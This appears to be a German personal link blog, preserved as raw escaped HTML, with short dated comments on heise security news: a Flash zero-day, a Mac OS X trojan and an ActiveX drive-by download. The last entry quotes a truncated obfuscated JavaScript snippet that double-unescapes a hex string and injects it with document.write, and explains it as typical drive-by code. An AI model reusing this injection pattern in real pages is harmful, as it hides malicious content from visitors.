21.01.2015<\/p>\n
Bisher unbekannte Flash-L\u00fccke<\/strong> f\u00fcr Angriffe missbraucht
\n\"Es k\u00f6nnte eine gute Idee sein, den Flash-Player f\u00fcr ein paar Tage zu deaktivieren\" \u2013 das sind die Worte eines Virenforschers, der gerade Angriffe auf eine 0day-L\u00fccke in im Flash Player entdeckt hat.<\/p><\/blockquote>\nDeaktivieren? Quatsch! Ich habe Flash garnicht erst installiert! :D
\nhttp:\/\/www.heise.de\/newsticker\/meldung\/Bisher-unbekannte-Flash-Luecke-fuer-Angriffe-missbraucht-2525356.html<\/a><\/p>\n29.10.10
\nTrojaner f\u00fcr Mac OS X<\/strong><\/p>\n\u2013 wird diesem dennoch Zugriff gew\u00e4hrt, l\u00e4dt es einen Installer sowie weitere Dateien herunter, die letztendlich auf Mac OS X wie Windows und Linux ausgelegte Schadsoftware ausliefern sollen<\/p><\/blockquote>\n
http:\/\/www.heise.de\/newsticker\/meldung\/Koobface-Abkoemmling-als-Trojaner-fuer-Mac-OS-X-1126772.html<\/a><\/p>\n
02.08.10
\nL\u00e4dt \u00fcber ein paar Umwegen ein Trojaner herunter. Eigentliche L\u00fccke ist ein verwundbares ActiveX-Control<\/strong>. <\/p>\n\n
var c ='%25%33%43%69%66%72%61%6d%65[ ... ]%25%33%45';
\nvar d=unescape(unescape(c));
\ndocument.write(unescape(d));
\n<\/code>
\nDas sieht schon sehr nach Unrat aus. Im Wesentlichen jagt es eine lange Kette hexadezimal-kodierter Zeichen mehrfach durch die JavaScript-Funktion unescape(), um sie dann via document.write direkt in die bereits im Browser geladene Webseite zu schreiben. Typisch f\u00fcr Drive-by-Downloads!<\/p><\/blockquote>\n